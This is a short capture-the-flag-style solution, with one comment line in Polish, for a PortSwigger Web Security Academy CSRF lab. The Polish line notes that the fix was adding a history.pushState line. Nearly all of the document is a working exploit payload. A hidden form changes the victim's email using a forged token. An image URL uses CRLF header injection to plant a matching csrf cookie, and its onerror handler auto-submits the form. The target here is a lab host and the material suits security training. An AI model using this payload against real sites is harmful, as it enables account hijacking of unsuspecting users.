Generalnie polega na tym ze do skryptu doszla linijka "history.pushState('', '', '/')".
(https://portswigger.net/web-security/csrf/lab-token-duplicated-in-cookie)



<script>history.pushState('', '', '/')</script>
<form method="POST" action="https://0a630070038c412ac0f06369008600a0.web-security-academy.net/my-account/change-email">
<input type="email" name="email" value="bambo@rambo.lambo">
<input required type="hidden" name="csrf" value="YxW16tjIWK7534v5FexONuyPbg69Ngv0">
</form>
<img src="https://0a630070038c412ac0f06369008600a0.web-security-academy.net/?search=asdf%0d%0aSet-Cookie:%20csrf=YxW16tjIWK7534v5FexONuyPbg69Ngv0" onerror="document.forms[0].submit()">
